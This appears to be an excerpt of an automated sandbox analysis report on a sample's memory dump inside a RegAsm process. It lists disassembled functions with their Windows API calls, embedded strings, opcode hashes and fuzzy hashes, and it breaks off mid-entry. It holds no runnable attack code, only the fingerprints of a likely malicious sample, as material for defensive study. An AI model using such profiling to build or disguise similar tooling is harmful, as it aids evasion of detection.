                                                          Download Yara Rule
                                                          APIs
                                                          • wcslen.MSVCRT ref: 0040B1DE
                                                          • ??3@YAXPAX@Z.MSVCRT ref: 0040B201
                                                            • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                            • Part of subcall function 004099F4: memcpy.MSVCRT ref: 00409A28
                                                            • Part of subcall function 004099F4: ??3@YAXPAX@Z.MSVCRT ref: 00409A31
                                                          • ??3@YAXPAX@Z.MSVCRT ref: 0040B224
                                                          • memcpy.MSVCRT ref: 0040B248
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: ??3@$memcpy$mallocwcslen
                                                          • String ID:
                                                          • API String ID: 3023356884-0
                                                          • Opcode ID: 6421ea3f553dae7d25363b5bd64276aec0fbe05fa0d8b4b2605bf4838246495e
                                                          • Instruction ID: 71128cbd9221161776fa816c6212d75478d488e0bdd8d9cf72ea7cd81dda7be0
                                                          • Opcode Fuzzy Hash: 6421ea3f553dae7d25363b5bd64276aec0fbe05fa0d8b4b2605bf4838246495e
                                                          • Instruction Fuzzy Hash: 02215BB2500604EFD720DF18D881CAAB7F9EF49324B114A6EE452976A1CB35B9158B98
                                                          Function 0041298C Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 67COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: memcpy
                                                          • String ID: @
                                                          • API String ID: 3510742995-2766056989
                                                          • Opcode ID: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
                                                          • Instruction ID: b25eae0e74258469ce0af521155fdf6a80f479b4e9ffe9ec94392e3587c9c40c
                                                          • Opcode Fuzzy Hash: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
                                                          • Instruction Fuzzy Hash: 65115EF2A003057FDB349E15D980C9A77A8EF50394B00062FF90AD6151E7B8DEA5C7D9
                                                          Function 0040B0D1 Relevance: 6.1, APIs: 4, Instructions: 55stringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • strlen.MSVCRT ref: 0040B0D8
                                                          • ??3@YAXPAX@Z.MSVCRT ref: 0040B0FB
                                                            • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                            • Part of subcall function 004099F4: memcpy.MSVCRT ref: 00409A28
                                                            • Part of subcall function 004099F4: ??3@YAXPAX@Z.MSVCRT ref: 00409A31
                                                          • ??3@YAXPAX@Z.MSVCRT ref: 0040B12C
                                                          • memcpy.MSVCRT ref: 0040B159
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: ??3@$memcpy$mallocstrlen
                                                          • String ID:
                                                          • API String ID: 1171893557-0
                                                          • Opcode ID: 1049280fa2475c497c1b628b605c6dc2082e028c9e0fefa85919baabf6481477
                                                          • Instruction ID: 61abf4b4d63bdfee40e3433ef4540d9b033b11d4199be086b3082c0bee804e2f
                                                          • Opcode Fuzzy Hash: 1049280fa2475c497c1b628b605c6dc2082e028c9e0fefa85919baabf6481477
                                                          • Instruction Fuzzy Hash: CA113A712042019FD711DB98FC499267B66EB8733AB25833BF4045A2A3CBB99834865F
                                                          Function 004144BB Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • memset.MSVCRT ref: 004144E7
                                                            • Part of subcall function 0040A353: _snwprintf.MSVCRT ref: 0040A398
                                                            • Part of subcall function 0040A353: memcpy.MSVCRT ref: 0040A3A8
                                                          • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00414510
                                                          • memset.MSVCRT ref: 0041451A
                                                          • GetPrivateProfileStringW.KERNEL32(?,?,0044E518,?,00002000,?), ref: 0041453C
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: PrivateProfileStringmemset$Write_snwprintfmemcpy
                                                          • String ID:
                                                          • API String ID: 1127616056-0
                                                          • Opcode ID: 02b9e3d0e0b7074fd9b2be70e01a8c10e85f5fbe64ebb4837650a41ca567b1c2
                                                          • Instruction ID: e03fcf36bb778615f94f946172f2cadce4c7e53e7889dedf6030812535802df7
                                                          • Opcode Fuzzy Hash: 02b9e3d0e0b7074fd9b2be70e01a8c10e85f5fbe64ebb4837650a41ca567b1c2
                                                          • Instruction Fuzzy Hash: 9A1170B1500119BFEF115F65EC02EDA7B69EF04714F100066FB09B2060E6319A60DB9D
                                                          Function 00417434 Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,7591DF80,?,0041755F,?), ref: 00417452
                                                          • malloc.MSVCRT ref: 00417459
                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000,?,7591DF80,?,0041755F,?), ref: 00417478
                                                          • ??3@YAXPAX@Z.MSVCRT ref: 0041747F
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: ByteCharMultiWide$??3@malloc
                                                          • String ID:
                                                          • API String ID: 4284152360-0
                                                          • Opcode ID: 393c83f8647a4e4e905b151b9ea1406947fc62e9018515f0e7f821d7fee9a8df
                                                          • Instruction ID: 8389f0226c663b3c6d8c6253af8546a3d73aba679155ae8f7c82d0c1376384d0
                                                          • Opcode Fuzzy Hash: 393c83f8647a4e4e905b151b9ea1406947fc62e9018515f0e7f821d7fee9a8df
                                                          • Instruction Fuzzy Hash: 1DF0E9B620D21E3F7B006AB55CC0C7B7B9CD7862FCB11072FF51091180E9594C1116B6
                                                          Function 004123E2 Relevance: 6.0, APIs: 4, Instructions: 47registryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 00412403
                                                          • RegisterClassW.USER32(?), ref: 00412428
                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 0041242F
                                                          • CreateWindowExW.USER32(00000000,00000000,0044E518,00CF0000,00000000,00000000,00000280,000001E0,00000000,00000000,00000000), ref: 00412455
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: HandleModule$ClassCreateRegisterWindow
                                                          • String ID:
                                                          • API String ID: 2678498856-0
                                                          • Opcode ID: ffa2941c40dc3e4da5dfeb6f60aef2ef72cf6d205e20c7803454451710b81cbd
                                                          • Instruction ID: 2742b6e08e64d4f702ac0bdc031c2178a10537c5a2141806c9029dd5a11ba4c1
                                                          • Opcode Fuzzy Hash: ffa2941c40dc3e4da5dfeb6f60aef2ef72cf6d205e20c7803454451710b81cbd
                                                          • Instruction Fuzzy Hash: E601E5B1941228ABD7119FA68C89ADFBEBCFF09B14F10411AF514A2240D7B456408BE9
                                                          Function 00409B32 Relevance: 6.0, APIs: 4, Instructions: 47windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetDlgItem.USER32(?,?), ref: 00409B40
                                                          • SendMessageW.USER32(00000000,00000146,00000000,00000000), ref: 00409B58
                                                          • SendMessageW.USER32(00000000,00000150,00000000,00000000), ref: 00409B6E
                                                          • SendMessageW.USER32(00000000,0000014E,00000000,00000000), ref: 00409B91
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Item
                                                          • String ID:
                                                          • API String ID: 3888421826-0
                                                          • Opcode ID: cb9c6f71d59db109bdd11c185378715e2458b2dfdf7aafdda88e0268854c6760
                                                          • Instruction ID: c5475329a145d4377f6ebcab718370c73cf4573fffc80ea9acc016878d8bcf0e
                                                          • Opcode Fuzzy Hash: cb9c6f71d59db109bdd11c185378715e2458b2dfdf7aafdda88e0268854c6760
                                                          • Instruction Fuzzy Hash: 89F01D75A0010CBFEB019F959CC1CAF7BBDFB497A4B204475F504E2150D274AE41AA64
                                                          Function 00417B5E Relevance: 6.0, APIs: 4, Instructions: 45fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • memset.MSVCRT ref: 00417B7B
                                                          • UnlockFileEx.KERNEL32(?,00000000,?,00000000,?), ref: 00417B9B
                                                          • LockFileEx.KERNEL32(?,00000001,00000000,?,00000000,?), ref: 00417BA7
                                                          • GetLastError.KERNEL32 ref: 00417BB5
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: File$ErrorLastLockUnlockmemset
                                                          • String ID:
                                                          • API String ID: 3727323765-0
                                                          • Opcode ID: 8dd354450774e38097dcb59a2dc1954613c626237ffe04feccb939eb681cbc84
                                                          • Instruction ID: 0282759007fe27108f915f617c318df1b7667033481b7feabffed058191037b6
                                                          • Opcode Fuzzy Hash: 8dd354450774e38097dcb59a2dc1954613c626237ffe04feccb939eb681cbc84
                                                          • Instruction Fuzzy Hash: A801F971108208BFDB219FA5DC84D9B77B8FB40308F20483AF51395050D730A944CB65
                                                          Function 004173E4 Relevance: 6.0, APIs: 4, Instructions: 41COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,00417D63,?,?,00417D63,00418178,00000000,?,004183E5,?,00000000), ref: 004173FF
                                                          • malloc.MSVCRT ref: 00417407
                                                          • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,?,00417D63,00418178,00000000,?,004183E5,?,00000000,00000000,?), ref: 0041741E
                                                          • ??3@YAXPAX@Z.MSVCRT ref: 00417425
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: ByteCharMultiWide$??3@malloc
                                                          • String ID:
                                                          • API String ID: 4284152360-0
                                                          • Opcode ID: c62e76641e050cafa551b594d013d2ba0ec055e9779dbb9c6b02089c0e2d57f7
                                                          • Instruction ID: cad4d062c051d68cf548c6c9b5623cfc012c7edadb1d539185634ca375d1558c
                                                          • Opcode Fuzzy Hash: c62e76641e050cafa551b594d013d2ba0ec055e9779dbb9c6b02089c0e2d57f7
                                                          • Instruction Fuzzy Hash: E7F0377620921E7BDA1029655C40D77779CEB8B675B11072BBA10D21C1ED59D81005B5
                                                          Function 0040F64E Relevance: 6.0, APIs: 4, Instructions: 41filestringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • memset.MSVCRT ref: 0040F673
                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00007FFF,00000000,00000000,?,<item>), ref: 0040F690
                                                          • strlen.MSVCRT ref: 0040F6A2
                                                          • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F6B3
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                          • String ID:
                                                          • API String ID: 2754987064-0
                                                          • Opcode ID: 3f0454cb73c2afb10a3316e2dc28fa1dd1c693e32e23138b57773469a51e87f3
                                                          • Instruction ID: e5447571fde1e0de43d26e7f5909b1ba013d3ab3fbf9ce0dfcc5e01eb4e41d37
                                                          • Opcode Fuzzy Hash: 3f0454cb73c2afb10a3316e2dc28fa1dd1c693e32e23138b57773469a51e87f3
                                                          • Instruction Fuzzy Hash: 03F062B680102C7FEB81A794DC81DEB77ACEB05258F0080B2B715D2140E9749F484F7D
                                                          Function 0040F6BD Relevance: 6.0, APIs: 4, Instructions: 41filestringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • memset.MSVCRT ref: 0040F6E2
                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF,00000000,00000000,?,<item>), ref: 0040F6FB
                                                          • strlen.MSVCRT ref: 0040F70D
                                                          • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F71E
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                          • String ID:
                                                          • API String ID: 2754987064-0
                                                          • Opcode ID: 7e04724105a3fa4aadef5922e8bb643722353f9661974f919d975e4a71db6ff5
                                                          • Instruction ID: 4069f22fd96ae38f7b0fbed24adb75974e75abfa9f51d26af0f678a77882025e
                                                          • Opcode Fuzzy Hash: 7e04724105a3fa4aadef5922e8bb643722353f9661974f919d975e4a71db6ff5
                                                          • Instruction Fuzzy Hash: C8F06DB780022CBFFB059B94DCC8DEB77ACEB05254F0000A2B715D2042E6749F448BB8
                                                          Function 00414770 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 40COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: wcscpy$CloseHandle
                                                          • String ID: General
                                                          • API String ID: 3722638380-26480598
                                                          • Opcode ID: d203a37054ecec13293c6845d931113d91e33057b6480a05be5df7ab04b5f2c3
                                                          • Instruction ID: 029e45c8424a23c50dbc4d8c1dfe1f9d14d00e2cf8bd1bf10ef2c4f99c7741b7
                                                          • Opcode Fuzzy Hash: d203a37054ecec13293c6845d931113d91e33057b6480a05be5df7ab04b5f2c3
                                                          • Instruction Fuzzy Hash: 52F024B30083146FF7205B509C85EAF769CEB86369F25482FF05592092C7398C448669
                                                          Function 0041437B Relevance: 6.0, APIs: 4, Instructions: 38COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00409D7F: memset.MSVCRT ref: 00409D9E
                                                            • Part of subcall function 00409D7F: GetClassNameW.USER32(?,00000000,000000FF), ref: 00409DB5
                                                            • Part of subcall function 00409D7F: _wcsicmp.MSVCRT ref: 00409DC7
                                                          • SetBkMode.GDI32(?,00000001), ref: 004143A2
                                                          • SetBkColor.GDI32(?,00FFFFFF), ref: 004143B0
                                                          • SetTextColor.GDI32(?,00C00000), ref: 004143BE
                                                          • GetStockObject.GDI32(00000000), ref: 004143C6
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: Color$ClassModeNameObjectStockText_wcsicmpmemset
                                                          • String ID:
                                                          • API String ID: 764393265-0
                                                          • Opcode ID: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                                          • Instruction ID: 55a1794077c12dabf0ba6e1c8d3319674f3f2ba5a0574a39bcd6537ad23d1771
                                                          • Opcode Fuzzy Hash: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                                          • Instruction Fuzzy Hash: 3AF06835200219BBCF112FA5EC06EDD3F25BF05321F104536FA25A45F1CBB59D609759
                                                          Function 0040A751 Relevance: 6.0, APIs: 4, Instructions: 34timeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A76D
                                                          • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?,?,?), ref: 0040A77D
                                                          • SystemTimeToFileTime.KERNEL32(?,?,?,?), ref: 0040A78C
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: Time$System$File$LocalSpecific
                                                          • String ID:
                                                          • API String ID: 979780441-0
                                                          • Opcode ID: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                                                          • Instruction ID: f583aad53f3de4022dcae7e9f33737e8013f67213d7447df07319dea818b2b95
                                                          • Opcode Fuzzy Hash: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                                                          • Instruction Fuzzy Hash: 48F08272900219AFEB019BB1DC49FBBB3FCBB0570AF04443AE112E1090D774D0058B65
                                                          Function 004134C6 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • memcpy.MSVCRT ref: 004134E0
                                                          • memcpy.MSVCRT ref: 004134F2
                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 00413505
                                                          • DialogBoxParamW.USER32(00000000,0000006B,?,Function_000131DC,00000000), ref: 00413519
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: memcpy$DialogHandleModuleParam
                                                          • String ID:
                                                          • API String ID: 1386444988-0
                                                          • Opcode ID: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                                                          • Instruction ID: 364e94b7bdcda47f4d7f1f8d7aeee0d56301a77e6e21c3ce81869cca2c347424
                                                          • Opcode Fuzzy Hash: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                                                          • Instruction Fuzzy Hash: 80F0E272A843207BF7207FA5AC0AB477E94FB05B03F114826F600E50D2C2B988518F8D
                                                          Function 0040F75C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 111COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • wcschr.MSVCRT ref: 0040F79E
                                                          • wcschr.MSVCRT ref: 0040F7AC
                                                            • Part of subcall function 0040AA8C: wcslen.MSVCRT ref: 0040AAA8
                                                            • Part of subcall function 0040AA8C: memcpy.MSVCRT ref: 0040AACB
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: wcschr$memcpywcslen
                                                          • String ID: "
                                                          • API String ID: 1983396471-123907689
                                                          • Opcode ID: a49a7bca3fdcf7d664bb1a19bbfdf9ac20233bdad490a911e177b035a317b33a
                                                          • Instruction ID: b5ec2b97dc3a1d34b4ae52474db4a85f3d32b900c8044ec90cdce640e07fed14
                                                          • Opcode Fuzzy Hash: a49a7bca3fdcf7d664bb1a19bbfdf9ac20233bdad490a911e177b035a317b33a
                                                          • Instruction Fuzzy Hash: 7C315532904204ABDF24EFA6C8419EEB7B4EF44324F20457BEC10B75D1DB789A46CE99
                                                          Function 0040A353 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: _snwprintfmemcpy
                                                          • String ID: %2.2X
                                                          • API String ID: 2789212964-323797159
                                                          • Opcode ID: 565383a1db30c24bbe212324ccaa161bb2139c15501903e42e5a35b00c7b7038
                                                          • Instruction ID: 802357eb4f50a043e47c8b78e7782d62930b20b04af67ea92e1f933aeb07fc5a
                                                          • Opcode Fuzzy Hash: 565383a1db30c24bbe212324ccaa161bb2139c15501903e42e5a35b00c7b7038
                                                          • Instruction Fuzzy Hash: 71118E32900309BFEB10DFE8D8829AFB3B9FB05314F108476ED11E7141D6789A258B96
                                                          Function 0040F9B5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: _snwprintf
                                                          • String ID: %%-%d.%ds
                                                          • API String ID: 3988819677-2008345750
                                                          • Opcode ID: ff7c17540168d96ed4966b56b0a467b3337874ab214ea8a90bdbbe2252cfc3dc
                                                          • Instruction ID: 7541af853baca77dfc804340e5f0ab0fe899c5989b891af63cf45e557cb41de3
                                                          • Opcode Fuzzy Hash: ff7c17540168d96ed4966b56b0a467b3337874ab214ea8a90bdbbe2252cfc3dc
                                                          • Instruction Fuzzy Hash: B801DE71200204BFD720EE59CC82D5AB7E8FB48308B00443AF846A7692D636E854CB65
                                                          Function 0040E758 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • memset.MSVCRT ref: 0040E770
                                                          • SendMessageW.USER32(F^@,0000105F,00000000,?), ref: 0040E79F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: MessageSendmemset
                                                          • String ID: F^@
                                                          • API String ID: 568519121-3652327722
                                                          • Opcode ID: f8314852293f46423bc2a010faad31e0b7cb282108ef47112cad279f3d3f551f
                                                          • Instruction ID: 5049a961280a3e8282645b70ff0f7bf8ff78c54eb6baa8beabb6daf17925e322
                                                          • Opcode Fuzzy Hash: f8314852293f46423bc2a010faad31e0b7cb282108ef47112cad279f3d3f551f
                                                          • Instruction Fuzzy Hash: A701A239900204ABEB209F5ACC81EABB7F8FF44B45F008429E854A7291D3349855CF79
                                                          Function 004018DB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: PlacementWindowmemset
                                                          • String ID: WinPos
                                                          • API String ID: 4036792311-2823255486
                                                          • Opcode ID: 43a26fe09d4836415a0f9153b5f51c370111d8f5fda2234af2192006d5bb601b
                                                          • Instruction ID: 942d740d8c3c01bede0812328a3a4706cce13fdf2e849e9dfea5930b7654417c
                                                          • Opcode Fuzzy Hash: 43a26fe09d4836415a0f9153b5f51c370111d8f5fda2234af2192006d5bb601b
                                                          • Instruction Fuzzy Hash: D4F096B0600204EFEB04DF55D899F6A33E8EF04701F1440B9F909DB1D1E7B89A04C729
                                                          Function 0040DCE0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                          • wcsrchr.MSVCRT ref: 0040DCE9
                                                          • wcscat.MSVCRT ref: 0040DCFF
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: FileModuleNamewcscatwcsrchr
                                                          • String ID: _lng.ini
                                                          • API String ID: 383090722-1948609170
                                                          • Opcode ID: d415c57d84eb2c5e7c8364d47a353e5cf76fbd17fa45f1fd58641194e3ec22f3
                                                          • Instruction ID: 003e7a9acac466aac22365d7a2b75ab102816a5e64793edac74c8fca87dba5cc
                                                          • Opcode Fuzzy Hash: d415c57d84eb2c5e7c8364d47a353e5cf76fbd17fa45f1fd58641194e3ec22f3
                                                          • Instruction Fuzzy Hash: CEC0129654561430F51526116C03B4E12585F13316F21006BFD01340C3EFAD5705406F
                                                          Function 00414B81 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 13libraryloaderCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                            • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                            • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                            • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                            • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                            • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                          • GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: LibraryLoad$AddressDirectoryProcSystemmemsetwcscatwcscpy
                                                          • String ID: SHGetSpecialFolderPathW$shell32.dll
                                                          • API String ID: 2773794195-880857682
                                                          • Opcode ID: c93510e3b53e51a0fa34588ad362a10002a2b390dcacad00d2ab9882db4cd41e
                                                          • Instruction ID: 520684b8054713cb13715c6c8af1848dbb459e29e8538d47b3508bbaa4bbc045
                                                          • Opcode Fuzzy Hash: c93510e3b53e51a0fa34588ad362a10002a2b390dcacad00d2ab9882db4cd41e
                                                          • Instruction Fuzzy Hash: 23D0C7719483019DD7105F65AC19B8336545B50307F204077AC04E66D7EA7CC4C49E1D
                                                          Function 0042B9BD Relevance: 5.2, APIs: 4, Instructions: 181COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: memcpy$memset
                                                          • String ID:
                                                          • API String ID: 438689982-0
                                                          • Opcode ID: ef116662622e1dd2984e515fcaedae38b96dc359db8ee055bda91140f73fb117
                                                          • Instruction ID: 797e1fd24865db6de4a95defd5ca955254a0dec7c2ff798398e4890fb9874305
                                                          • Opcode Fuzzy Hash: ef116662622e1dd2984e515fcaedae38b96dc359db8ee055bda91140f73fb117
                                                          • Instruction Fuzzy Hash: 1B51A2B5A00219EBDF14DF55D882BAEBBB5FF04340F54806AE904AA245E7389E50DBD8
                                                          Function 0040E820 Relevance: 5.1, APIs: 4, Instructions: 70COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2127559059.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
